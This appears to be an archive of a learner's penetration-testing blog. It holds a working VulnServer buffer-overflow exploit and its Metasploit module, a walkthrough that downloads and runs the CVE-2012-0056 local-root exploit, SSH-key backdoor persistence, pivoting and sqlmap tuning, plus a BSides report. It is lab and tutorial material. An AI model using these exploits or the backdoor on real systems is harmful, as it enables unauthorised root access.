Porting VulnServer TRUN /.:/ exploit to Metasploit

Pre-requisites  : http://resources.infosecinstitute.com/stack-based-buffer-overflow-tutorial-part-1-%E2%80%94-introduction/

Bof Template used : https://www.corelan.be/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/

I followed the bof tutorial using python 🙂

The python version of the exploit looks like

[cc lang=”python”]
import struct
import socket
ret=”\xAF\x11\x50\x62″ #625011AF JMP ESP essfunc.dll
nop=”\x90″*32
shellcode=(“\xCC\xCC\xCC”) #use your own Shellcode bad chars \x00\x0A\x0D
buffer= “A”*2003 + ret + nop + shellcode + “D”*636
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((‘127.0.0.1’,9999))
s.recv(1024)
s.send(‘TRUN /.:/’ + buffer)
s.close()
[/cc]

To port to Metasploit you need to think about the type of exploit it is…remote windows. [cc lang=”ruby”]class Metasploit3 < Msf::Exploit::Remote[/cc]
This means you will need a TCP connection. [cc lang=”ruby”]include Msf::Exploit::Remote::Tcp[/cc]
Default port number for vunserver is 9999 [cc lang=”ruby”]9999 Opt::RPORT(9999)[/cc]
Then you will need to think about the elements of the buffer. sploit 🙂
The starting “TRUN /.:/” command, then the junk space, in Metasploit NOPS are used instead of “A”* 2003 using make_nops()
Next we need to know the return address that will be inside EIP, this will be 0x625011AF from essfunc.dll, this is universal as it’s from the vunserver program dll.
[cc lang=”ruby”]
‘Targets’ =>
[
[‘Windows XP Universal’,
{ ‘Ret’ => 0x625011af, ‘Offset’ => 2003 } ],
],
[/cc]
In the ‘payload’ section we add the amount of space allowed for shellcode and the bad chars
[cc lang=”ruby”]
‘Payload’ =>
{
‘Space’ => 900,
‘BadChars’ => “\x00\x0A\x0D”,
},
[/cc]
Then we need to add a nop slide because the shellcode will need space in memory to decode. payload.encoded handles all the payload encoding and decoding in memory, so no decoding nops needed, they are added just incase.
Then the amount of space for shellcode, in this case it’s around 900 which is loads of space for shellcode
This makes the final sploit
[cc lang=”ruby”]

sploit = ‘TRUN /.:/’ + junk + [target.ret].pack(‘V’) + make_nops(32) + payload.encoded

[/cc]
This makes the Metasploit module:

[cc lang=”ruby”]
# Metasploit template from corelan.be
# BoF for vunserver thegreycorner.com
require ‘msf/core’

class Metasploit3 < Msf::Exploit::Remote # A remote exploit

include Msf::Exploit::Remote::Tcp # using TCP connection

def initialize(info = {})
super(update_info(info,
‘Name’ => ‘Vunserver stack overflow’,
‘Description’ => %q{
This module exploits a stack overflow in a
vulnserver.
},
‘Author’ => [ ‘Stephen Bradshaw’,’Duncan Winfrey’ ],
‘Version’ => ‘$Revision: 9999 $’,
‘References’ =>
[
[ ‘Vunserver’, ‘http://www.thegreycorner.com/p/vulnserver.html’ ],
[ ‘corelan.be’, ‘http://tinyurl.com/64s3je4’ ],
],

‘DefaultOptions’ =>
{
‘EXITFUNC’ => ‘process’,
},
‘Payload’ =>
{
‘Space’ => 500,
‘BadChars’ => “\x00\x0A\x0D”,
},
‘Platform’ => ‘win’,

‘Targets’ =>
[
[‘Windows XP Universal’,
{ ‘Ret’ => 0x625011af, ‘Offset’ => 2003 } ],
],
‘DefaultTarget’ => 0,

‘Privileged’ => false
))

register_options(
[
Opt::RPORT(9999)
], self.class)
end

def exploit
connect

junk = make_nops(target[‘Offset’])
sploit = ‘TRUN /.:/’ + junk + [target.ret].pack(‘V’) + make_nops(32) + payload.encoded
sock.put(sploit)

handler
disconnect

end

end
[/cc]

Then put the code into /opt/metasploit/msf3/modules/exploits/windows/misc as vun_server_bof.rb

Then tested it out 😀

Backdoor Linux using SSH keys

In the penetrating with backtrack labs on viewing the/etc/passwd it’s sometimes full of other students usernames which is not very stealthy and is very noticeable, it also opens up additional vulnrablites if it were  a real pentest.

It is far easier to add your own ssh key to the root/.ssh/authorized_keys

 

First create your ssh key with the command below and hit enter a few times:

$ ssh-keygen

This will create a few files in /root/.ssh/ including id_rsa.pub

Once created you need to copy the contents of your “id_rsa.pub” to end of the authorized_keys file on the compromised host.

This is usually in /root/.ssh/authorized_keys

Then you can just ssh -p 22 root@IP and you will be logged in as root.

 

Simple port killing bash script

Sometimes a port is left listeing from a process that was not properly killed. This simple bash script should kill that port.
[cc lang=”bash”]
#!/bin/bash
killport=$1
process=$(netstat -tulpn | grep “$killport” | cut -d”/” -f1 | cut -d” ” -f44)
kill -9 “$process”
[/cc]

Using HTTP proxy tools over SSH tunnels

When pivoting through a Linux box I wanted to use Dirbuster through the ssh tunnel.

Unfortunately DirBuster does not support SOCKS5 proxies, therefore I decided to use a tool called polipo.

Polipo allows you to have a parent socks5 proxy that is then used to make  a local http proxy on a port you specify.

I used the default config file from TOR. Config file

To get it working:

$polipo -c torconfig

Established listening socket on port 8118.

Then connect to the pivot machine using

$ ssh -p 22 -D 127.0.0.1:9050 rootuser@192.168.1.31

Leave both console windows open and then

Config the tool you want to use localhost:1881

 

How Unique Is Your Browser?

A web browser does not simply just download and serve html anymore. Browsers have many features additional features that can be detected such as which version of flash your running, java and all add-ons you have installed which is can act as a very good fingerprint that be used to track people.

From the data collected 1 in 286,777 browers are unique, so from a legal point it would not stand in court.

You can test your brower uniqueness below

https://panopticlick.eff.org/index.php

The electronic froniter foundation has an excellant paper on browser uniqueness

https://panopticlick.eff.org/browser-uniqueness.pdf

 

Configuring sqlmap

Sqlmap is a great opensource SQL injection tool that I use to aide my learning using it’s -v switch that sets the output verbosity so you can see and learn the SQL payload sqlmap is sending. I usually set it to -v3

By default sqlmap tests for blind SQL injection first which is more often successful but is very slow at extracting data and is hard to follow.

The full default order is blind, error, union, stacked, time. “BEUST”

I prefer to use union,error,stacked,blind,time. “UESBT”

To change the default in sqlmap open up sqlmap.conf

On line 236 tech = BEUST to tech = UESBT

Sqlmap by default does not try all the different types of SQL injections as some are too noisy/risky.

This can mean that exploitable injections are missed. To avoid this sqlmap can be configured to test for all types of injection by changing level and risk settings.

On line 195 you can change the level = 1 to level = 5

On line 202 you can change the risk = 1 to risk = 3

By default sqlmap will only test for 10 columns when using UNION SQL injection, this is to low in most cases. I change the default to 50.

You can change this on line 246 uCols = 50

There are loads of other options you can change in sqlmap these are just a few 🙂

 

BSides 2012

BSides was the first secuity conferance I have attended. It was a stimulating  (club mate!) day packed full of all kinds of diffrent inforsec talks.

My day started at 2:40am making breakfast and inadvertently waking up a flatmate who  was not amused. I then caught the coach to Victoria  coach station and had a wet trek through London to the Barbican .

I attended the “breaking into security” talk from RandomStorm’s Robin which answered lots of questions about the best route into infosec. The talk was based on statisics Robin had collected online to try and get an un-biased view on what programming languages to learn and courses to go on to become a good penetration tester. The answer that supised me was that a big % of people did not think you need to know how to program to be a good penetration tester, which is wrong. SLIDES

You can take the survey here

The next talk I was going to attend was cancelled so I stayed and listened to the back-up talk from james davis which was on incident response incidents at Janet. The talk was amusing with tales about malicious students phishing there own university pretending to be student finance. Another story was about china ISP’s sending weird DNS requests apparently to cache websites because the request was timing out from some parts of china.

The digital forensics talk was cancelled and a back-up talk on true random number generation was the topic of the next talk. Maths can be  quite boring but the speaker Paco Hope made it entertaining. He talked about the common mistakes made when making random numbers such as using a modulo operation so that random numbers not in wanted range can be used, introduces bias. Paco also talked about how important having a random seed is as an example he talked about PartyPoker which made an error with it’s random shuffling seeding as it used the server time stamp as the basis of the seed. ParyPoker made available it’s shuffling algo so in theory Pokerhands could be reverse engineered. The talk also mentioned to keep things simple as overcomplicating number generation  makes it easier to introduce bias.  More on random numbers

Throughout the day I went around the stands and was lucky to get a fun t-shirt from MWR Infosec Labs, shown below.

In the afternoon I went to the MWR SAP slapping talk which is totally new to me. SAP systems talk was interesting as Dave Hartley was trying to help make SAP systems more secure as he found numerous vulnerability in the demo SAP system yet SAP refused to allow him access to full retail versions unless he paid. He did eventually get access to a SAP system for further research.

The next talk was on Satellite hacking which I will not write about as it was not allowed to be recorded.

The talk I went to next was my favorite of the day as it was on HTML 5 which brings new functionality to the web but also opens up a whole new array of security issues. The talk first went through the good parts of HTML 5, then the not so good parts and innovative ways to exploit HTML 5 new functions such as a “Botnet in the browser” that allows anyone to become a temporarily part of a botnet just by loading a webpage. Robert also talked about readily available tools from http://www.andlabs.org/tools.html  and Beef. He also demoed a PoC botnet that had DOS and HTML 5 geolocation tracking. He also mentioned http://html5security.org/ as  a good HTML 5 resource.

The next talk I went to was from Arron “finux” Finnon on the design flaws of UPnP which allows you to open ports on your home router as part of UPnP functionality. UPnP can be used for malicious  purposes  as no authentication is required when requesting and receiving information using the protocol as it’s seamless. It was also humerus as in the audience were some BT engineers that Finux’s talks have been giving a headache over BT’s homehub UPnP (lack of) security. Some links : UMAP , http://www.upnp-hacks.org/,UPnP Router Controller

The final talk I attended was on privilege escalation on webapps but the talk had lots of emphasis on showing clients a working exploit to demonstrate to them how serious the issue really is. He demoed that an XSS can really be serious when used as CSRF to add an admin account to wordpress (Why does wordpress not use a captcha?). SLIDES

I  attended the conservatory shorty to listen to glyn wintle talk on writing  javascript with only 8 chars to bypass XSS filters.  Here is a snapshot of coventry uni students in a group talk.

 

Before I left I handed in my feedback form and received a yubico key which I am yet to configure but will do shortly.

The afterparty was fun 🙂 Talked to some very interesting people.

 

Linux kernel CVE-2012-0056 Walk through

This is a walk through to using the recent Linux Local Root for >=2.6.39, 32-bit and 64-bit by zx2c4

First you need to check what kernel the box is running.

# uname -r

In my case under backtrack 5 which is based on Ubuntu that users the kernel 2.6.39.4 which in vulnerable.

I then added a normal user that I would use for the demo

 #useradd test

I then logged back in with test account

Then I checked what privileges the account had

#groups test

Which showed test was not a root enabled account

I then moved from to the Desktop

#cd /Desktop

I then made a folder to store the exploit source in.

#mkdir mempodipper

Then I moved to mempodipper directory

# cd /mempodipper

Then I downloaded the exploit source from github

#wget http://git.zx2c4.com/CVE-2012-0056/plain/mempodipper.c

Then compiled it

#gcc mempodipper.c -w -o mempodipper

Then ran it

#./memopdipper

It then gave all its output from the exploit, it was successful as it gave me a root shell

#whoami

returned root confirming that it worked.

I then added myself to the usergroup root

#sudo adduser test admin

Adding user `test’ to group `admin’ …

Adding user test to group admin

Done.

So from a test account you have got a full root account 😀

Then I verified that the user had really been added to the group root

#groups test

Source used to make this post and an in depth technical explanation of the exploit : http://blog.zx2c4.com/749